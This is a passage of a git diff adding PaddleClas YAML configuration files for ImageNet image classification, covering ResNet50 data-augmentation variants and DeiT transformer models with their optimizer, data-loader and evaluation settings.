lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - Cutout: + n_holes: 1 + length: 112 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_GridMask.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_GridMask.yaml new file mode 100644 index 0000000..ed180b5 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_GridMask.yaml @@ -0,0 +1,134 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNet50 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - GridMask: + d1: 96 + d2: 224 + rotate: 1 + ratio: 0.5 + mode: 0 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_HideAndSeek.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_HideAndSeek.yaml new file mode 100644 index 0000000..107738f --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_HideAndSeek.yaml @@ -0,0 +1,129 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNet50 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - HideAndSeek: + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_Mixup.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_Mixup.yaml new file mode 100644 index 0000000..b125671 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_Mixup.yaml @@ -0,0 +1,128 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNet50 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_RandAugment.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_RandAugment.yaml new file mode 100644 index 0000000..b0b6bfd --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_RandAugment.yaml @@ -0,0 +1,131 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNet50 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - RandAugment: + num_layers: 2 + magnitude: 5 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_RandomErasing.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_RandomErasing.yaml new file mode 100644 index 0000000..216caa3 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DataAugment/ResNet50_RandomErasing.yaml @@ -0,0 +1,134 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNet50 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.5 + sl: 0.02 + sh: 0.4 + r1: 0.3 + mean: [0., 0., 0.] + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DeiT/DeiT_base_distilled_patch16_224.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DeiT/DeiT_base_distilled_patch16_224.yaml new file mode 100644 index 0000000..fb3b9cc --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DeiT/DeiT_base_distilled_patch16_224.yaml @@ -0,0 +1,154 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DeiT_base_distilled_patch16_224 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + +Optimizer: + name: AdamW + beta1: 0.9 + beta2: 0.999 + epsilon: 1e-8 + weight_decay: 0.05 + no_weight_decay_name: norm cls_token pos_embed dist_token + one_dim_param_no_weight_decay: True + lr: + name: Cosine + learning_rate: 1e-3 + eta_min: 1e-5 + warmup_epoch: 5 + warmup_start_lr: 1e-6 + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + interpolation: bicubic + backend: pil + - RandFlipImage: + flip_code: 1 + - TimmAutoAugment: + config_str: rand-m9-mstd0.5-inc1 + interpolation: bicubic + img_size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.25 + sl: 0.02 + sh: 1.0/3.0 + r1: 0.3 + attempt: 10 + use_log_aspect: True + mode: pixel + batch_transform_ops: + - OpSampler: + MixupOperator: + alpha: 0.8 + prob: 0.5 + CutmixOperator: + alpha: 1.0 + prob: 0.5 + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DeiT/DeiT_base_distilled_patch16_384.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DeiT/DeiT_base_distilled_patch16_384.yaml new file mode 100644 index 0000000..d30b5f7 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DeiT/DeiT_base_distilled_patch16_384.yaml @@ -0,0 +1,154 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 384, 384] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DeiT_base_distilled_patch16_384 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + +Optimizer: + name: AdamW + beta1: 0.9 + beta2: 0.999 + epsilon: 1e-8 + weight_decay: 0.05 + no_weight_decay_name: norm cls_token pos_embed dist_token + one_dim_param_no_weight_decay: True + lr: + name: Cosine + learning_rate: 1e-3 + eta_min: 1e-5 + warmup_epoch: 5 + warmup_start_lr: 1e-6 + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 384 + interpolation: bicubic + backend: pil + - RandFlipImage: + flip_code: 1 + - TimmAutoAugment: + config_str: rand-m9-mstd0.5-inc1 + interpolation: bicubic + img_size: 384 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.25 + sl: 0.02 + sh: 1.0/3.0 + r1: 0.3 + attempt: 10 + use_log_aspect: True + mode: pixel + batch_transform_ops: + - OpSampler: + MixupOperator: + alpha: 0.8 + prob: 0.5 + CutmixOperator: + alpha: 1.0 + prob: 0.5 + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 438 + interpolation: bicubic + backend: pil + - CropImage: + size: 384 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 438 + interpolation: bicubic + backend: pil + - CropImage: + size: 384 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DeiT/DeiT_base_patch16_224.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DeiT/DeiT_base_patch16_224.yaml new file mode 100644 index 0000000..8f4207e --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DeiT/DeiT_base_patch16_224.yaml @@ -0,0 +1,154 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DeiT_base_patch16_224 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + +Optimizer: + name: AdamW + beta1: 0.9 + beta2: 0.999 + epsilon: 1e-8 + weight_decay: 0.05 + no_weight_decay_name: norm cls_token pos_embed dist_token + one_dim_param_no_weight_decay: True + lr: + name: Cosine + learning_rate: 1e-3 + eta_min: 1e-5 + warmup_epoch: 5 + warmup_start_lr: 1e-6 + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + interpolation: bicubic + backend: pil + - RandFlipImage: + flip_code: 1 + - TimmAutoAugment: + config_str: rand-m9-mstd0.5-inc1 + interpolation: bicubic + img_size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.25 + sl: 0.02 + sh: 1.0/3.0 + r1: 0.3 + attempt: 10 + use_log_aspect: True + mode: pixel + batch_transform_ops: + - OpSampler: + MixupOperator: + alpha: 0.8 + prob: 0.5 + CutmixOperator: + alpha: 1.0 + prob: 0.5 + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DeiT/DeiT_base_patch16_384.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DeiT/DeiT_base_patch16_384.yaml new file mode 100644 index 0000000..00afe54 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DeiT/DeiT_base_patch16_384.yaml @@ -0,0 +1,154 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 384, 384] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DeiT_base_patch16_384 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + +Optimizer: + name: AdamW + beta1: 0.9 + beta2: 0.999 + epsilon: 1e-8 + weight_decay: 0.05 + no_weight_decay_name: norm cls_token pos_embed dist_token + one_dim_param_no_weight_decay: True + lr: + name: Cosine + learning_rate: 1e-3 + eta_min: 1e-5 + warmup_epoch: 5 + warmup_start_lr: 1e-6 + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 384 + interpolation: bicubic + backend: pil + - RandFlipImage: + flip_code: 1 + - TimmAutoAugment: + config_str: rand-m9-mstd0.5-inc1 + interpolation: bicubic + img_size: 384 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.25 + sl: 0.02 + sh: 1.0/3.0 + r1: 0.3 + attempt: 10 + use_log_aspect: True + mode: pixel + batch_transform_ops: + - OpSampler: + MixupOperator: + alpha: 0.8 + prob: 0.5 + CutmixOperator: + alpha: 1.0 + prob: 0.5 + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 438 + interpolation: bicubic + backend: pil + - CropImage: + size: 384 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 438 + interpolation: bicubic + backend: pil + - CropImage: + size: 384 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DeiT/DeiT_small_distilled_patch16_224.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DeiT/DeiT_small_distilled_patch16_224.yaml new file mode 100644 index 0000000..c27bed4 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DeiT/DeiT_small_distilled_patch16_224.yaml @@ -0,0 +1,154 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DeiT_small_distilled_patch16_224 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + +Optimizer: + name: AdamW + beta1: 0.9 + beta2: 0.999 + epsilon: 1e-8 + weight_decay: 0.05 + no_weight_decay_name: norm cls_token pos_embed dist_token + one_dim_param_no_weight_decay: True + lr: + name: Cosine + learning_rate: 1e-3 + eta_min: 1e-5 + warmup_epoch: 5 + warmup_start_lr: 1e-6 + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + 